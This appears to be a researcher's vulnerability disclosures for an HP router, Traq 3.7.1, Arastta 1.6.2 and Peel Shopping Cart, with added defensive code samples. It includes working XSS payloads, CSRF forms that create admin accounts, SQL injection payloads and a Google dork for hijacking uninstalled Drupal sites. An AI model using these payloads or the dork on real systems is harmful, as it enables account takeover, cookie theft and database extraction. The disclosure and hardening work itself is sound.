HP R110 Wireless 11n VPN AM Router Credential exposure.

I recently purchased an HP R110 Wireless 11n VPN AM Router (Product No: J9974A).


I noticed that by default it communicates over HTTP instead of HTTPS. This matters because every single request the user sends after logging in carries the login name and password, in the GET/POST requests to the router.

[Photo of the captured request: img_20181206_181635.jpg]

I apologize for the bad "screenshot" (a phone camera photo).

The 'username=admin; password=admin' pair shows up in every request after login. I used the default credentials in this example so that I didn't give my own away.
This might not seem like a big deal, but anyone sniffing the network could obtain these credentials.
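The following is an added example, not part of the original post: a small audit script of the kind a defender could run over requests exported from a packet capture of the router's LAN. It flags any request whose query string, form body or Cookie header carries a password-like field, and records whether the request travelled over plaintext HTTP (the severe case this post describes) or over TLS (still poor design, since the credentials are being reused as a session token). The sample requests, the field-name lists and the record shape are all constructed for the demo.

```python
"""Audit captured HTTP requests for credentials sent with every request."""
from urllib.parse import parse_qsl, urlsplit

# Field names treated as secrets (assumption: tune per device/application).
SECRET_FIELDS = {"password", "passwd", "pwd", "pass", "secret", "token"}

# Constructed sample capture: the kind of records a defender would export from
# Wireshark/tcpdump after sniffing the LAN the router lives on. 192.0.2.1 is a
# documentation address, not a real device.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "http://192.0.2.1/login.cgi",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "username=admin&password=admin"},
    {"method": "GET", "url": "http://192.0.2.1/status.html?page=1",
     "headers": {"Cookie": "username=admin; password=admin"}, "body": ""},
    {"method": "GET", "url": "https://192.0.2.1/status.html",
     "headers": {"Cookie": "username=admin; password=admin"}, "body": ""},
    {"method": "GET", "url": "http://192.0.2.1/wan.html?page=2",
     "headers": {"Cookie": "session=3f9a1c"}, "body": ""},
]


def _cookie_pairs(cookie_header):
    """Split 'a=1; b=2' into [('a', '1'), ('b', '2')]; parts without '=' are skipped."""
    pairs = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def _names(pairs):
    """Lower-cased set of field names from a list of (name, value) pairs."""
    return {name.lower() for name, _ in pairs}


def find_credential_leaks(requests):
    """Return one finding per request that carries a secret field anywhere.

    A finding records where the secret travelled (query, body, cookie) and
    whether the request was plaintext HTTP, which is the severe case.
    """
    findings = []
    for req in requests:
        parts = urlsplit(req["url"])
        headers = req.get("headers", {})
        where = []
        if _names(parse_qsl(parts.query)) & SECRET_FIELDS:
            where.append("query")
        ctype = headers.get("Content-Type", "")
        if (ctype.startswith("application/x-www-form-urlencoded")
                and _names(parse_qsl(req.get("body", ""))) & SECRET_FIELDS):
            where.append("body")
        if _names(_cookie_pairs(headers.get("Cookie", ""))) & SECRET_FIELDS:
            where.append("cookie")
        if where:
            findings.append({
                "method": req["method"],
                "path": parts.path,
                "where": where,
                "plaintext": parts.scheme == "http",
            })
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_REQUESTS):
        severity = "HIGH" if f["plaintext"] else "MEDIUM"
        print(f'{severity}: {f["method"]} {f["path"]} -> secret in {", ".join(f["where"])}')
```

Run against the constructed capture it reports the login POST body and the plaintext cookie as HIGH and the TLS cookie as MEDIUM; the fourth request, which carries only an opaque session id, is not reported. The real fix on the device side is to enable HTTPS and to issue a random session identifier after login rather than echoing the credentials.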

Traq 3.7.1 multiple vulnerabilities.

=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.

CVE: CVE-2018-20780
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user, etc.

2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search=">alert(document.domain)

3: CSRF - XSS
This was a POST XSS combined with a CSRF vulnerability in the email parameter of the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/usercp" method="POST">
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="email" value="tt1kr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;awezh" />
<input type="hidden" name="watch_created_tickets" value="1" />
<input type="hidden" name="locale" value="enus" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

4: CSRF - XSS
This was a POST XSS combined with a CSRF vulnerability in the name and email parameters of the following request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="user1" />
<input type="hidden" name="name" value="guyj&quot;&gt;&lt;img src=a onerror=alert(document.domain)&gt;mztcr" />
<input type="hidden" name="password" value="userpass" />
<input type="hidden" name="email" value="test@testy2.comlgfyr&quot;&gt;&lt;img src=a onerror=alert(document.cookie)&gt;jj194" />
<input type="hidden" name="group_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

5: Admin user creation via CSRF, using the same request as item 4 above. The XSS could be used to notify the attacker when the admin triggers the CSRF; the admin account is created by setting group_id to 1 in this request.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">
<input type="hidden" name="username" value="testadmin" />
<input type="hidden" name="name" value="guy smiley" />
<input type="hidden" name="password" value="testadmin" />
<input type="hidden" name="email" value="testadmin@evil.com" />
<input type="hidden" name="group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
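Items 3 to 5 share one root cause: the usercp and admin/users/new handlers accept any POST that arrives with the victim's session cookie, and then echo the name/email fields unencoded. The block below is an added example, not Traq's code, modelling how those two handlers look once hardened: each session owns a random synchronizer token that a cross-site form cannot read, the Origin/Referer header is checked against the site's own origin, admin user creation additionally requires an admin session, and the profile is HTML-encoded on output so the injected markup is displayed as text. The session store, the request/response shape, the site origin and the group-id convention are assumptions made for the demo; the email payload in demo() is the one from item 3 above.

```python
"""Synchronizer-token CSRF defence plus output encoding for the profile and admin forms."""
import hmac
import html
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://example.com"  # assumed origin of the Traq install


class SessionStore:
    """In-memory sessions; each one owns a random CSRF token (assumption)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, is_admin=False):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "admin": is_admin,
                               "csrf": secrets.token_urlsafe(32), "profile": {}}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)


def csrf_ok(request, session):
    """True only if the submitted token matches the session's and Origin (when sent) is ours."""
    sent = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(sent, session["csrf"]):
        return False  # a forged cross-site form cannot know the token
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin:
        o = urlsplit(origin)
        if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
            return False
    return True


def render_profile(profile):
    """Encode on output so '"><img src=a onerror=...>' is shown, not executed."""
    return (f'<p>Name: {html.escape(profile.get("name", ""))}</p>'
            f'<p>Email: {html.escape(profile.get("email", ""))}</p>')


def handle_usercp(request, store):
    """POST /usercp: returns (status, body)."""
    session = store.get(request["cookies"].get("sid", ""))
    if session is None:
        return 401, ""
    if not csrf_ok(request, session):
        return 403, ""
    session["profile"] = {"name": request["form"].get("name", ""),
                          "email": request["form"].get("email", "")}
    return 200, render_profile(session["profile"])


def handle_admin_new_user(request, store, users):
    """POST /admin/users/new: requires an admin session AND a valid token; returns status."""
    session = store.get(request["cookies"].get("sid", ""))
    if session is None or not session["admin"]:
        return 403
    if not csrf_ok(request, session):
        return 403
    form = request["form"]
    users[form["username"]] = {"group_id": int(form.get("group_id", "2"))}  # assumed: 1 = admin
    return 201


def demo():
    """Replay the shape of the PoCs above against the hardened handlers."""
    store, users = SessionStore(), {}
    sid = store.create("admin", is_admin=True)
    payload = 'tt1kr"><img src=a onerror=alert(document.cookie)>awezh'
    attacker = {"Origin": "http://attacker.invalid"}  # .invalid TLD: placeholder origin
    forged = {"cookies": {"sid": sid}, "headers": attacker,
              "form": {"name": "Administrator", "email": payload}}
    legit = {"cookies": {"sid": sid}, "headers": {"Origin": SITE_ORIGIN},
             "form": {"csrf_token": store.get(sid)["csrf"],
                      "name": "Administrator", "email": payload}}
    forged_admin = {"cookies": {"sid": sid}, "headers": attacker,
                    "form": {"username": "testadmin", "password": "x", "group_id": "1"}}
    return (handle_usercp(forged, store), handle_usercp(legit, store),
            handle_admin_new_user(forged_admin, store, users), users)


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The forged profile update and the forged admin creation both come back 403 and no user is written, while the legitimate submission succeeds and renders the injected markup as `&lt;img ...&gt;`. Token comparison uses hmac.compare_digest so a missing or partial token fails without leaking timing information; the Origin check is a second, independent layer, since some proxies strip Referer.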

6: SQL injection via the search parameter. I was able to have sqlmap return the database's current user and the database type. The following is the SQL injection I used to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=') RLIKE (SELECT (CASE WHEN (6383=6383) THEN '' ELSE 0x28 END)) AND ('yDch'='yDch&order_by=component.asc

(@DamianEbelties): https://twitter.com/DamianEbelties

Sent this cleaned-up payload, thanks!

"%%27)%20and%20updatexml(null,concat(0x0a,version()),null)--%20-"
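Both payloads above work because the search term is spliced into the SQL text, so a closing quote and bracket let the rest of the input become part of the query. The block below is an added example, not Traq's code: an in-memory SQLite table stands in for the tickets table, and the string-built search is shown beside the parameterised one. With the bound parameter the same probe can only ever be matched as literal text, and the LIKE wildcards in user input are escaped so a search for "100%" means the characters "100%". The table rows, the probe string and the query shape are constructed for the demo.

```python
"""String-built vs parameterised ticket search (SQLite standing in for Traq's MySQL)."""
import sqlite3

# Constructed rows standing in for Traq's tickets table.
ROWS = [
    (1, "Login page broken", "open"),
    (2, "Typo in footer", "closed"),
    (3, "CPU at 100% load", "open"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, summary TEXT, status TEXT)")
    conn.executemany("INSERT INTO tickets VALUES (?, ?, ?)", ROWS)
    return conn


def search_unsafe(conn, term):
    """Vulnerable: the search term is pasted into the SQL text, as in the report."""
    sql = f"SELECT id, summary FROM tickets WHERE (summary LIKE '%{term}%')"
    return conn.execute(sql).fetchall()


def _escape_like(term):
    """Neutralise LIKE metacharacters so a user typing '%' or '_' matches literally."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, term):
    """Fixed: the term is bound as a parameter, so it can only ever be data."""
    sql = "SELECT id, summary FROM tickets WHERE (summary LIKE ? ESCAPE '\\')"
    return conn.execute(sql, (f"%{_escape_like(term)}%",)).fetchall()


def demo():
    """Run the same probe through both versions, plus ordinary searches through the safe one."""
    conn = make_db()
    # Same class of input as sqlmap used above: close the quote and bracket, append a
    # SELECT that returns the engine version, and let '--' comment out the trailing "%')".
    probe = "zzz') UNION SELECT 0, sqlite_version() --"
    return {
        "unsafe_probe": search_unsafe(conn, probe),    # leaks (0, '<engine version>')
        "safe_probe": search_safe(conn, probe),        # [] : no summary contains that text
        "safe_plain": search_safe(conn, "Login"),      # the ordinary search still works
        "safe_wildcard": search_safe(conn, "100%"),    # literal '%' matches row 3 only
        "safe_underscore": search_safe(conn, "100_"),  # literal '_' matches nothing
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The unsafe path returns the engine version row (the SQLite analogue of the version() extraction above) even though no ticket matches, while the safe path returns nothing for the probe and behaves correctly for normal searches. In the PHP original the equivalent fix is a prepared statement with a bound placeholder; whitelisting the order_by column names is a separate fix, since identifiers cannot be bound as parameters.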

7: There appears to be no session timeout; the admin account stayed logged in for two days.
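An added example, not Traq's code, of the two limits a session store should enforce so that item 7 cannot happen: an idle timeout that ends the session after a period without requests, and an absolute timeout that ends it a fixed time after login however active the user is. Expiry is checked server-side on every request and the expired record is discarded, rather than trusting an expiry date in the cookie. The timeout values, the session table and the explicit clock parameter (used so the timelines can be replayed deterministically) are assumptions for the demo.

```python
"""Idle and absolute session lifetimes enforced server-side."""
import time

IDLE_TIMEOUT = 30 * 60       # assumed policy: 30 minutes without a request
ABSOLUTE_TIMEOUT = 8 * 3600  # assumed policy: 8 hours since login, regardless of activity


class Session:
    def __init__(self, user, now):
        self.user = user
        self.created = now
        self.last_seen = now

    def touch(self, now):
        """Validate on every request; False once either limit has been passed."""
        if now - self.created > ABSOLUTE_TIMEOUT:
            return False
        if now - self.last_seen > IDLE_TIMEOUT:
            return False
        self.last_seen = now
        return True


class SessionTable:
    """Server-side session table that forgets expired entries instead of trusting the cookie."""

    def __init__(self):
        self._sessions = {}

    def login(self, sid, user, now=None):
        self._sessions[sid] = Session(user, time.time() if now is None else now)

    def user_for(self, sid, now=None):
        """Return the user for a live session, or None (and drop the session)."""
        now = time.time() if now is None else now
        session = self._sessions.get(sid)
        if session is None:
            return None
        if not session.touch(now):
            del self._sessions[sid]
            return None
        return session.user

    def live_count(self):
        return len(self._sessions)


def demo():
    """Two timelines: one admin idles past 30 min, another stays busy past 8 h."""
    table = SessionTable()
    table.login("idle-sid", "admin", now=0)
    table.login("busy-sid", "admin", now=0)
    # Requests at 10, 41 and 80 minutes: the second is already past the idle limit.
    idle_results = [table.user_for("idle-sid", now=t) for t in (10 * 60, 41 * 60, 80 * 60)]
    # A request every 10 minutes for a little over 8 hours: the absolute limit ends it.
    busy_results = [table.user_for("busy-sid", now=t)
                    for t in range(600, ABSOLUTE_TIMEOUT + 1201, 600)]
    return idle_results, busy_results, table.live_count()


if __name__ == "__main__":
    idle, busy, live = demo()
    print("idle timeline:", idle)
    print("busy timeline: %d accepted, %d rejected" % (busy.count("admin"), busy.count(None)))
    print("sessions still stored:", live)
```

In the replay the idle session answers once and is then gone, the busy session answers for the 48 ten-minute requests inside the 8-hour window and is rejected afterwards, and both records have been purged from the table by the end.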

Drupal takeover

Google dork for populated but not installed versions of Drupal

inurl:install.php select an installation profile

Negative intext result: "drupal already installed"
Positive intext result: "select an installation profile"

If Drupal is populated but not installed, you can install Drupal and become admin.

Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 xss vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
mattjoeland@gmail.com
twitter.com/matthewjland
https://mjlanders.org/

The XSS that I have found is fairly straightforward.

http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.


Peel Shopping Cart 9.0.0 csrf/xss disclosure.

Description: Peel Shopping Cart is prone to various CSRF and XSS vulnerabilities.
The CSRF example below opens two tabs. The first tab adds an item to the user's cart,
and the second tab modifies the attributes of that item, showing a POST XSS.

Also, the XSS appears to be persistent for as long as the modified cart item remains in the cart.

Here is a link to a PoC; obviously, replace all hostnames with the host you would like to test.
Packetstormsecurity.com